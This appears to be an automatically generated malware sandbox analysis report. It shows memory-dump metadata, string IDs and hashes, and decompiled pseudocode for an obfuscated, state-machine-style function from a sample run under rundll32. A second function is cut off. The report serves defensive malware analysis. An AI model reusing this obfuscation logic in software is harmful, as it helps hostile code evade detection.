                                                                                                                      0x00181f52
                                                                                                                      0x00181f5d
                                                                                                                      0x00181f73
                                                                                                                      0x00181f7a
                                                                                                                      0x00181f85
                                                                                                                      0x00181f97
                                                                                                                      0x00181f9c
                                                                                                                      0x00181fa5
                                                                                                                      0x00181fb0
                                                                                                                      0x00181fbb
                                                                                                                      0x00181fc3
                                                                                                                      0x00181fcb
                                                                                                                      0x00181fd3
                                                                                                                      0x00181fd8
                                                                                                                      0x00181fe0
                                                                                                                      0x00181fe8
                                                                                                                      0x00181ff1
                                                                                                                      0x00181ff6
                                                                                                                      0x00181ffc
                                                                                                                      0x00182004
                                                                                                                      0x0018200c
                                                                                                                      0x00182017
                                                                                                                      0x00182022
                                                                                                                      0x0018202d
                                                                                                                      0x00182035
                                                                                                                      0x0018203d
                                                                                                                      0x00182045
                                                                                                                      0x0018204d
                                                                                                                      0x00182058
                                                                                                                      0x00182063
                                                                                                                      0x0018206e
                                                                                                                      0x00182079

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: e15cb535f6193e9fed94072fe96c2fd3000cd6a4fa2da1fdf83c740c7d3fef5c
                                                                                                                      • Instruction ID: 44fbbb04835a20b012a849d5d9d353ba312e4dce13dd20ab5179ef5254204ce0
                                                                                                                      • Opcode Fuzzy Hash: e15cb535f6193e9fed94072fe96c2fd3000cd6a4fa2da1fdf83c740c7d3fef5c
                                                                                                                      • Instruction Fuzzy Hash: 6B72FEB15083819BD379CF65C58AB8FBBE2BBD4304F10891DE2DA96260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E001899AA() {
                                                                                                                      				void* _t393;
                                                                                                                      				signed int _t395;
                                                                                                                      				signed int _t396;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t416;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr* _t464;
                                                                                                                      				signed int _t468;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t472;
                                                                                                                      				signed int _t473;
                                                                                                                      				signed int _t474;
                                                                                                                      				signed int _t475;
                                                                                                                      				signed int _t476;
                                                                                                                      				signed int _t477;
                                                                                                                      				signed int _t478;
                                                                                                                      				signed int _t479;
                                                                                                                      				signed int _t480;
                                                                                                                      				signed int _t481;
                                                                                                                      				signed int _t482;
                                                                                                                      				signed int _t483;
                                                                                                                      				signed int _t485;
                                                                                                                      				void* _t489;
                                                                                                                      
                                                                                                                      				 *(_t489 + 0x98) = 0xc8da52;
                                                                                                                      				 *(_t489 + 0xa0) = 0;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
                                                                                                                      				_t420 = 0x1be807e;
                                                                                                                      				 *(_t489 + 0x30) = 0x503fa2;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
                                                                                                                      				 *(_t489 + 0xa4) = 0;
                                                                                                                      				_t471 = 0x25;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
                                                                                                                      				 *(_t489 + 0x7c) = 0x85e0fa;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
                                                                                                                      				_t472 = 0x78;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
                                                                                                                      				 *(_t489 + 0x20) = 0x383fb4;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
                                                                                                                      				 *(_t489 + 0x5c) = 0xbb8564;
                                                                                                                      				_t473 = 0x44;
                                                                                                                      				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
                                                                                                                      				_t474 = 0x6f;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
                                                                                                                      				 *(_t489 + 0x14) = 0x7f7e5e;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
                                                                                                                      				 *(_t489 + 0x98) = 0xf466ca;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
                                                                                                                      				 *(_t489 + 0x8c) = 0xf41dfa;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
                                                                                                                      				 *(_t489 + 0x70) = 0x5bd344;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
                                                                                                                      				 *(_t489 + 0x20) = 0x13a841;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
                                                                                                                      				 *(_t489 + 0x38) = 0xfa8d3a;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
                                                                                                                      				 *(_t489 + 0x48) = 0x9c2d9c;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
                                                                                                                      				 *(_t489 + 0x80) = 0x96612e;
                                                                                                                      				_t475 = 0x1b;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
                                                                                                                      				 *(_t489 + 0x1c) = 0xc28e37;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
                                                                                                                      				 *(_t489 + 0x34) = 0xb1f5e0;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
                                                                                                                      				_t476 = 0x71;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
                                                                                                                      				 *(_t489 + 0x78) = 0xafc36d;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
                                                                                                                      				_t477 = 0x76;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
                                                                                                                      				 *(_t489 + 0x98) = 0x19521f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
                                                                                                                      				 *(_t489 + 0xa0) = 0x8c17;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
                                                                                                                      				 *(_t489 + 0xa4) = 0xd8bcc0;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
                                                                                                                      				 *(_t489 + 0x28) = 0x29b40a;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
                                                                                                                      				_t478 = 0x4b;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
                                                                                                                      				 *(_t489 + 0x58) = 0x4b8f45;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
                                                                                                                      				_t479 = 0x65;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
                                                                                                                      				 *(_t489 + 0x50) = 0xbe9ee7;
                                                                                                                      				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
                                                                                                                      				_t480 = 0x21;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
                                                                                                                      				 *(_t489 + 0x60) = 0x65600b;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
                                                                                                                      				 *(_t489 + 0x2c) = 0xa0640b;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
                                                                                                                      				_t487 =  *(_t489 + 0x80);
                                                                                                                      				_t481 = 0x18;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
                                                                                                                      				 *(_t489 + 0x88) = 0xf27f7;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
                                                                                                                      				 *(_t489 + 0x60) = 0x482c82;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
                                                                                                                      				 *(_t489 + 0x70) = 0x370d16;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
                                                                                                                      				 *(_t489 + 0x68) = 0x1def33;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
                                                                                                                      				 *(_t489 + 0x6c) = 0xb09c0e;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
                                                                                                                      				 *(_t489 + 0x54) = 0x47a16a;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
                                                                                                                      				 *(_t489 + 0x94) = 0xf12a19;
                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
                                                                                                                      				 *(_t489 + 0x14) = 0xa6bc3b;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
                                                                                                                      				_t482 = 0x17;
                                                                                                                      				_t468 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
                                                                                                                      				 *(_t489 + 0x3c) = 0xc5a0fe;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
                                                                                                                      				_t418 =  *(_t489 + 0x7c);
                                                                                                                      				_t483 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x88) = 0x6bfd68;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
                                                                                                                      				 *(_t489 + 0x44) = 0xc29f93;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
                                                                                                                      				 *(_t489 + 0x34) = 0x1f0cbd;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t393 = 0x26766da;
                                                                                                                      					L2:
                                                                                                                      					while(_t420 != 0x1be807e) {
                                                                                                                      						if(_t420 == _t393) {
                                                                                                                      							_t395 = E001757CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
                                                                                                                      							_t489 = _t489 + 0x30;
                                                                                                                      							__eflags = _t395;
                                                                                                                      							if(_t395 == 0) {
                                                                                                                      								_t396 =  *(_t489 + 0xa4);
                                                                                                                      							} else {
                                                                                                                      								_t485 = _t468;
                                                                                                                      								while(1) {
                                                                                                                      									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      									if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L17:
                                                                                                                      									_t349 = _t485 + 0xc; // 0x11e18
                                                                                                                      									_t401 = E0018FC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
                                                                                                                      									_t489 = _t489 + 0xc;
                                                                                                                      									__eflags = _t401;
                                                                                                                      									if(_t401 == 0) {
                                                                                                                      										_t396 = 1;
                                                                                                                      										 *(_t489 + 0xa4) = 1;
                                                                                                                      									} else {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L23:
                                                                                                                      									_t483 =  *(_t489 + 0x7c);
                                                                                                                      									goto L24;
                                                                                                                      									L18:
                                                                                                                      									_t399 =  *_t485;
                                                                                                                      									__eflags = _t399;
                                                                                                                      									if(_t399 == 0) {
                                                                                                                      										_t396 =  *(_t489 + 0xa4);
                                                                                                                      									} else {
                                                                                                                      										_t485 = _t485 + _t399;
                                                                                                                      										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      										if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      											goto L18;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									goto L23;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L24:
                                                                                                                      							__eflags = _t396;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t393 = 0x26766da;
                                                                                                                      								_t420 = 0x26766da;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t464 =  *0x195208; // 0x0
                                                                                                                      								E00177519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
                                                                                                                      								_t420 = 0xa9f14cf;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							L32:
                                                                                                                      						} else {
                                                                                                                      							if(_t420 == 0x7d55797) {
                                                                                                                      								_t334 = _t489 + 0x28; // 0x6f6c7a54
                                                                                                                      								E001912A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
                                                                                                                      								_t405 = E00184FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
                                                                                                                      								_t487 = _t405;
                                                                                                                      								_t489 = _t489 + 0x14;
                                                                                                                      								_t420 = 0xe18b597;
                                                                                                                      								 *((short*)(_t405 - 2)) = 0;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t393 = 0x26766da;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t420 == 0x9eda0b2) {
                                                                                                                      									E00184DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
                                                                                                                      								} else {
                                                                                                                      									if(_t420 == 0xa9f14cf) {
                                                                                                                      										E001768DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
                                                                                                                      										_t489 = _t489 + 0xc;
                                                                                                                      										_t420 = 0x9eda0b2;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t420 == 0xacf19b8) {
                                                                                                                      											_t483 = 0x1000;
                                                                                                                      											_push(_t420);
                                                                                                                      											_push(_t420);
                                                                                                                      											 *(_t489 + 0x84) = 0x1000;
                                                                                                                      											_t468 = E00183512(0x1000);
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											__eflags = _t468;
                                                                                                                      											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t420 != 0xe18b597) {
                                                                                                                      												L28:
                                                                                                                      												__eflags = _t420 - 0x5473740;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t416 = E0018E938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
                                                                                                                      												_t418 = _t416;
                                                                                                                      												_t489 = _t489 + 0x28;
                                                                                                                      												if(_t416 != 0xffffffff) {
                                                                                                                      													_t420 = 0xacf19b8;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t393 = 0x26766da;
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						__eflags = 0;
                                                                                                                      						return 0;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_t420 = 0x7d55797;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}




























                                                                                                                      0x00189e63
                                                                                                                      0x00189e67
                                                                                                                      0x00189e6f
                                                                                                                      0x00189e77
                                                                                                                      0x00189e7f
                                                                                                                      0x00189e87
                                                                                                                      0x00189e8f
                                                                                                                      0x00189e94
                                                                                                                      0x00189e9c
                                                                                                                      0x00189ea0
                                                                                                                      0x00189ea4
                                                                                                                      0x00189eaf
                                                                                                                      0x00189eba
                                                                                                                      0x00189ec5
                                                                                                                      0x00189ecd
                                                                                                                      0x00189ed2
                                                                                                                      0x00189ed6
                                                                                                                      0x00189ede
                                                                                                                      0x00189ee6
                                                                                                                      0x00189eee
                                                                                                                      0x00189ef6
                                                                                                                      0x00189efe
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f0b
                                                                                                                      0x00189f19
                                                                                                                      0x0018a08a
                                                                                                                      0x0018a08f
                                                                                                                      0x0018a092
                                                                                                                      0x0018a094
                                                                                                                      0x0018a0d4
                                                                                                                      0x0018a096
                                                                                                                      0x0018a096
                                                                                                                      0x0018a098
                                                                                                                      0x0018a098
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a09e
                                                                                                                      0x0018a09e
                                                                                                                      0x0018a0b2
                                                                                                                      0x0018a0b7
                                                                                                                      0x0018a0ba
                                                                                                                      0x0018a0bc
                                                                                                                      0x0018a0ca
                                                                                                                      0x0018a0cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a0e4
                                                                                                                      0x0018a0e4
                                                                                                                      0x00000000
                                                                                                                      0x0018a0be
                                                                                                                      0x0018a0be
                                                                                                                      0x0018a0c0
                                                                                                                      0x0018a0c2
                                                                                                                      0x0018a0dd
                                                                                                                      0x0018a0c4
                                                                                                                      0x0018a0c4
                                                                                                                      0x0018a098
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a09c
                                                                                                                      0x00000000
                                                                                                                      0x0018a0c2
                                                                                                                      0x0018a098
                                                                                                                      0x0018a0e8
                                                                                                                      0x0018a0e8
                                                                                                                      0x0018a0ea
                                                                                                                      0x0018a10c
                                                                                                                      0x0018a111
                                                                                                                      0x00000000
                                                                                                                      0x0018a0ec
                                                                                                                      0x0018a0f0
                                                                                                                      0x0018a0fc
                                                                                                                      0x0018a102
                                                                                                                      0x00000000
                                                                                                                      0x0018a102
                                                                                                                      0x00000000
                                                                                                                      0x00189f1f
                                                                                                                      0x00189f25
                                                                                                                      0x0018a01e
                                                                                                                      0x0018a022
                                                                                                                      0x0018a040
                                                                                                                      0x0018a045
                                                                                                                      0x0018a047
                                                                                                                      0x0018a04c
                                                                                                                      0x0018a051
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f2b
                                                                                                                      0x00189f31
                                                                                                                      0x0018a13f
                                                                                                                      0x00189f37
                                                                                                                      0x00189f3d
                                                                                                                      0x00189ffc
                                                                                                                      0x0018a001
                                                                                                                      0x0018a004
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f43
                                                                                                                      0x00189f49
                                                                                                                      0x00189fb3
                                                                                                                      0x00189fc0
                                                                                                                      0x00189fc1
                                                                                                                      0x00189fc4
                                                                                                                      0x00189fd1
                                                                                                                      0x00189fd3
                                                                                                                      0x00189fd9
                                                                                                                      0x00189fe0
                                                                                                                      0x00000000
                                                                                                                      0x00189f4b
                                                                                                                      0x00189f51
                                                                                                                      0x0018a11d
                                                                                                                      0x0018a11d
                                                                                                                      0x0018a123
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a129
                                                                                                                      0x00189f57
                                                                                                                      0x00189f8f
                                                                                                                      0x00189f94
                                                                                                                      0x00189f96
                                                                                                                      0x00189f9c
                                                                                                                      0x00189fa2
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00000000
                                                                                                                      0x00189f06
                                                                                                                      0x00189f06
                                                                                                                      0x00189f9c
                                                                                                                      0x00189f51
                                                                                                                      0x00189f49
                                                                                                                      0x00189f3d
                                                                                                                      0x00189f31
                                                                                                                      0x00189f25
                                                                                                                      0x0018a14a
                                                                                                                      0x0018a153
                                                                                                                      0x00000000
                                                                                                                      0x0018a153
                                                                                                                      0x0018a118
                                                                                                                      0x00000000
                                                                                                                      0x0018a118

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$r.5$A$r!
                                                                                                                      • API String ID: 0-357391454
                                                                                                                      • Opcode ID: a4500d445bf42e4b7bb23ca610d87d4b35c3412e7271430e61cde4b38224a93b
                                                                                                                      • Instruction ID: ceca6bedb634903ab13114c41890fad1b973022b4bde89f98c4996a88c1f976c
                                                                                                                      • Opcode Fuzzy Hash: a4500d445bf42e4b7bb23ca610d87d4b35c3412e7271430e61cde4b38224a93b
                                                                                                                      • Instruction Fuzzy Hash: ED1236715083809FD3A8DF25C589A5BBBE1FBC4754F508A1DF2DA86260D7B48A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00177B82(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
